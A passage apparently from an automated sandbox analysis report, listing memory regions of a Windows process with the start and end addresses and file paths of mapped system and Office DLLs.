= 0x7ff961960000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 1386 start_va = 0x7ff961c00000 end_va = 0x7ff961dfdfff entry_point = 0x7ff961c00000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 1387 start_va = 0x7ff961e00000 end_va = 0x7ff961e5bfff entry_point = 0x7ff961e00000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 1388 start_va = 0x7ff961e60000 end_va = 0x7ff961e6bfff entry_point = 0x7ff961e60000 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 1389 start_va = 0x7ff965900000 end_va = 0x7ff96594dfff entry_point = 0x7ff965900000 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 1390 start_va = 0x7ff965950000 end_va = 0x7ff965965fff entry_point = 0x7ff965950000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 1391 start_va = 0x7ff965980000 end_va = 0x7ff965a18fff entry_point = 0x7ff965980000 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 1392 start_va = 0x7ff965aa0000 end_va = 0x7ff965d31fff entry_point = 0x7ff965aa0000 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 1393 start_va = 0x7ff965e40000 end_va = 0x7ff965e99fff entry_point = 0x7ff965e40000 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 1394 start_va = 0x7ff965f00000 end_va = 0x7ff965f98fff entry_point = 0x7ff965f00000 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 1395 start_va = 0x7ff965fa0000 end_va = 0x7ff965facfff entry_point = 0x7ff965fa0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 1396 start_va = 0x7ff965fb0000 end_va = 0x7ff966073fff entry_point = 0x7ff965fb0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1397 start_va = 0x7ff966080000 end_va = 0x7ff9660b6fff entry_point = 0x7ff966080000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 1398 start_va = 0x7ff9660c0000 end_va = 0x7ff966135fff entry_point = 0x7ff9660c0000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 1399 start_va = 0x7ff966140000 end_va = 0x7ff9662e8fff entry_point = 0x7ff966140000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\gdiplus.dll") Region: id = 1400 start_va = 0x7ff9662f0000 end_va = 0x7ff966301fff entry_point = 0x7ff9662f0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1401 start_va = 0x7ff966360000 end_va = 0x7ff9663fefff entry_point = 0x7ff966360000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 1402 start_va = 0x7ff966400000 end_va = 0x7ff966415fff entry_point = 0x7ff966400000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 1403 start_va = 0x7ff9664b0000 end_va = 0x7ff9667c2fff entry_point = 0x7ff9664b0000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 1404 start_va = 0x7ff9667d0000 end_va = 0x7ff966a8dfff entry_point = 0x7ff9667d0000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\amd64\\filesyncshell64.dll") Region: id = 1405 start_va = 0x7ff966a90000 end_va = 0x7ff966abafff entry_point = 0x7ff966a90000 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 1406 start_va = 0x7ff966ac0000 end_va = 0x7ff966accfff entry_point = 0x7ff966ac0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1407 start_va = 0x7ff966ad0000 end_va = 0x7ff966aeffff entry_point = 0x7ff966ad0000 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 1408 start_va = 0x7ff966af0000 end_va = 0x7ff966b05fff entry_point = 0x7ff966af0000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1409 start_va = 0x7ff966b10000 end_va = 0x7ff966bbbfff entry_point = 0x7ff966b10000 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 1410 start_va = 0x7ff966d00000 end_va = 0x7ff966d48fff entry_point = 0x7ff966d00000 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 1411 start_va = 0x7ff966d50000 end_va = 0x7ff966dd2fff entry_point = 0x7ff966d50000 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 1412 start_va = 0x7ff966de0000 end_va = 0x7ff966e2afff entry_point = 0x7ff966de0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1413 start_va = 0x7ff966e30000 end_va = 0x7ff966f03fff entry_point = 0x7ff966e30000 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 1414 start_va = 0x7ff966f10000 end_va = 0x7ff966fe9fff entry_point = 0x7ff966f10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1415 start_va = 0x7ff966ff0000 end_va = 0x7ff967007fff entry_point = 0x7ff966ff0000 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 1416 start_va = 0x7ff967010000 end_va = 0x7ff96712afff entry_point = 0x7ff967010000 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 1417 start_va = 0x7ff967130000 end_va = 0x7ff96733cfff entry_point = 0x7ff967130000 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 1418 start_va = 0x7ff967340000 end_va = 0x7ff96734ffff entry_point = 0x7ff967340000 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 1419 start_va = 0x7ff967350000 end_va = 0x7ff96739cfff entry_point = 0x7ff967350000 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 1420 start_va = 0x7ff9673a0000 end_va = 0x7ff967eacfff entry_point = 0x7ff9673a0000 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 1421 start_va = 0x7ff967eb0000 end_va = 0x7ff967ec4fff entry_point = 0x7ff967eb0000 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 1422 start_va = 0x7ff967ed0000 end_va = 0x7ff96835ffff entry_point = 0x7ff967ed0000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1423 start_va = 0x7ff968360000 end_va = 0x7ff9683a7fff entry_point = 0x7ff968360000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 1424 start_va = 0x7ff9683b0000 end_va = 0x7ff9683f5fff entry_point = 0x7ff9683b0000 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 1425 start_va = 0x7ff968400000 end_va = 0x7ff968468fff entry_point = 0x7ff968400000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1426 start_va = 0x7ff968470000 end_va = 0x7ff9684d4fff entry_point = 0x7ff968470000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1427 start_va = 0x7ff9684e0000 end_va = 0x7ff9685a5fff entry_point = 0x7ff9684e0000 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 1428 start_va = 0x7ff9685b0000 end_va = 0x7ff968690fff entry_point = 0x7ff9685b0000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 1429 start_va = 0x7ff9686a0000 end_va = 0x7ff9686b0fff entry_point = 0x7ff9686a0000 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 1430 start_va = 0x7ff9686c0000 end_va = 0x7ff968779fff entry_point = 0x7ff9686c0000 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 1431 start_va = 0x7ff968780000 end_va = 0x7ff9687abfff entry_point = 0x7ff968780000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 1432 start_va = 0x7ff9687b0000 end_va = 0x7ff9687d2fff entry_point = 0x7ff9687b0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1433 start_va = 0x7ff968e90000 end_va = 0x7ff968ea4fff entry_point = 0x7ff968e90000 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 1434 start_va = 0x7ff969650000 end_va = 0x7ff969ab9fff entry_point = 0x7ff969650000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1435 start_va = 0x7ff969b60000 end_va = 0x7ff969dc0fff entry_point = 0x7ff969b60000 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 1436 start_va = 0x7ff96a270000 end_va = 0x7ff96a2effff entry_point = 0x7ff96a270000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1437 start_va = 0x7ff96b080000 end_va = 0x7ff96b326fff entry_point = 0x7ff96b080000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1438 start_va = 0x7ff96b330000 end_va = 0x7ff96b39afff entry_point = 0x7ff96b330000 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 1439 start_va = 0x7ff96b4f0000 end_va = 0x7ff96b763fff entry_point = 0x7ff96b4f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 1440 start_va = 0x7ff96b770000 end_va = 0x7ff96b796fff entry_point = 0x7ff96b770000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 1441 start_va = 0x7ff96b950000 end_va = 0x7ff96bc8cfff entry_point = 0x7ff96b950000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1442 start_va = 0x7ff96bfc0000 end_va = 0x7ff96c01cfff entry_point = 0x7ff96bfc0000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1443 start_va = 0x7ff96c020000 end_va = 0x7ff96c06ffff entry_point = 0x7ff96c020000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1444 start_va = 0x7ff96c360000 end_va = 0x7ff96c369fff entry_point = 0x7ff96c360000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1445 start_va = 0x7ff96c450000 end_va = 0x7ff96c5e6fff entry_point = 0x7ff96c450000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1446 start_va = 0x7ff96c5f0000 end_va = 0x7ff96c62efff entry_point = 0x7ff96c5f0000 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 1447 start_va = 0x7ff96c630000 end_va = 0x7ff96c661fff entry_point = 0x7ff96c630000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1448 start_va = 0x7ff96c670000 end_va = 0x7ff96c684fff entry_point = 0x7ff96c670000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1449 start_va = 0x7ff96c690000 end_va = 0x7ff96c6cbfff entry_point = 0x7ff96c690000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1450 start_va = 0x7ff96c6d0000 end_va = 0x7ff96c6f0fff entry_point = 0x7ff96c6d0000 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 1451 start_va = 0x7ff96c700000 end_va = 0x7ff96c71dfff entry_point = 0x7ff96c700000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 1452 start_va = 0x7ff96cbd0000 end_va = 0x7ff96cbddfff entry_point = 0x7ff96cbd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1453 start_va = 0x7ff96cc10000 end_va = 0x7ff96cc21fff entry_point = 0x7ff96cc10000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1454 start_va = 0x7ff96cde0000 end_va = 0x7ff96ce11fff entry_point = 0x7ff96cde0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1455 start_va = 0x7ff96cf90000 end_va = 0x7ff96cfeefff entry_point = 0x7ff96cf90000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1456 start_va = 0x7ff96d300000 end_va = 0x7ff96d314fff entry_point = 0x7ff96d300000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1457 start_va = 0x7ff96d320000 end_va = 0x7ff96d35efff entry_point = 0x7ff96d320000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1458 start_va = 0x7ff96dd70000 end_va = 0x7ff96de7bfff entry_point = 0x7ff96dd70000 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 1459 start_va = 0x7ff96dec0000 end_va = 0x7ff96deeffff entry_point = 0x7ff96dec0000 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 1460 start_va = 0x7ff96def0000 end_va = 0x7ff96def9fff entry_point = 0x7ff96def0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1461 start_va = 0x7ff96e000000 end_va = 0x7ff96e0d5fff entry_point = 0x7ff96e000000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1462 start_va = 0x7ff96e3f0000 end_va = 0x7ff96e481fff entry_point = 0x7ff96e3f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1463 start_va = 0x7ff96e4e0000 end_va = 0x7ff96e518fff entry_point = 0x7ff96e4e0000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1464 start_va = 0x7ff96e690000 end_va = 0x7ff96ebd4fff entry_point = 0x7ff96e690000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 1465 start_va = 0x7ff96ecc0000 end_va = 0x7ff96ecf5fff entry_point = 0x7ff96ecc0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1466 start_va = 0x7ff96edf0000 end_va = 0x7ff96eee1fff entry_point = 0x7ff96edf0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1467 start_va = 0x7ff96f2f0000 end_va = 0x7ff96f4a6fff entry_point = 0x7ff96f2f0000 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 1468 start_va = 0x7ff96f5b0000 end_va = 0x7ff96f5c9fff entry_point = 0x7ff96f5b0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1469 start_va = 0x7ff96f5d0000 end_va = 0x7ff96f5e5fff entry_point = 0x7ff96f5d0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1470 start_va = 0x7ff96f600000 end_va = 0x7ff96f667fff entry_point = 0x7ff96f600000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1471 start_va = 0x7ff96f770000 end_va = 0x7ff96f77afff entry_point = 0x7ff96f770000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1472 start_va = 0x7ff96f790000 end_va = 0x7ff96f7abfff entry_point = 0x7ff96f790000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1473 start_va = 0x7ff96f7b0000 end_va = 0x7ff96f7fafff entry_point = 0x7ff96f7b0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1474 start_va = 0x7ff96f920000 end_va = 0x7ff96fc95fff entry_point = 0x7ff96f920000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1475 start_va = 0x7ff96fca0000 end_va = 0x7ff96fdd0fff entry_point = 0x7ff96fca0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1476 start_va = 0x7ff970e80000 end_va = 0x7ff970e95fff entry_point = 0x7ff970e80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1477 start_va = 0x7ff970ee0000 end_va = 0x7ff971091fff entry_point = 0x7ff970ee0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1478 start_va = 0x7ff9710a0000 end_va = 0x7ff9710b7fff entry_point = 0x7ff9710a0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1479 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1480 start_va = 0x7ff971310000 end_va = 0x7ff9713adfff entry_point = 0x7ff971310000 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 1481 start_va = 0x7ff9713b0000 end_va = 0x7ff971421fff entry_point = 0x7ff9713b0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1482 start_va = 0x7ff9716a0000 end_va = 0x7ff97190dfff entry_point = 0x7ff9716a0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 1483 start_va = 0x7ff971910000 end_va = 0x7ff971974fff entry_point = 0x7ff971910000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1484 start_va = 0x7ff971a40000 end_va = 0x7ff971b4efff entry_point = 0x7ff971a40000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1485 start_va = 0x7ff971b50000 end_va = 0x7ff971b60fff entry_point = 0x7ff971b50000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1486 start_va = 0x7ff971b90000 end_va = 0x7ff971c2bfff entry_point = 0x7ff971b90000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 1487 start_va = 0x7ff971df0000 end_va = 0x7ff971e69fff entry_point = 0x7ff971df0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1488 start_va = 0x7ff971e70000 end_va = 0x7ff971ed9fff entry_point = 0x7ff971e70000 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 1489 start_va = 0x7ff971f40000 end_va = 0x7ff971f4afff entry_point = 0x7ff971f40000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1490 start_va = 0x7ff971f50000 end_va = 0x7ff971f87fff entry_point = 0x7ff971f50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1491 start_va = 0x7ff971f90000 end_va = 0x7ff972232fff entry_point = 0x7ff971f90000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 1492 start_va = 0x7ff972370000 end_va = 0x7ff9723affff entry_point = 0x7ff972370000 region_type = mapped_file name = "windows.gaming.input.dll" filename = "\\Windows\\System32\\Windows.Gaming.Input.dll" (normalized: "c:\\windows\\system32\\windows.gaming.input.dll") Region: id = 1493 start_va = 0x7ff9723b0000 end_va = 0x7ff972448fff entry_point = 0x7ff9723b0000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1494 start_va = 0x7ff972450000 end_va = 0x7ff9724effff entry_point = 0x7ff972450000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1495 start_va = 0x7ff972590000 end_va = 0x7ff9725b1fff entry_point = 0x7ff972590000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1496 start_va = 0x7ff972800000 end_va = 0x7ff9728a0fff entry_point = 0x7ff972800000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1497 start_va = 0x7ff972a20000 end_va = 0x7ff972ae7fff entry_point = 0x7ff972a20000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 1498 start_va = 0x7ff972b60000 end_va = 0x7ff972bbbfff entry_point = 0x7ff972b60000 region_type = mapped_file name = 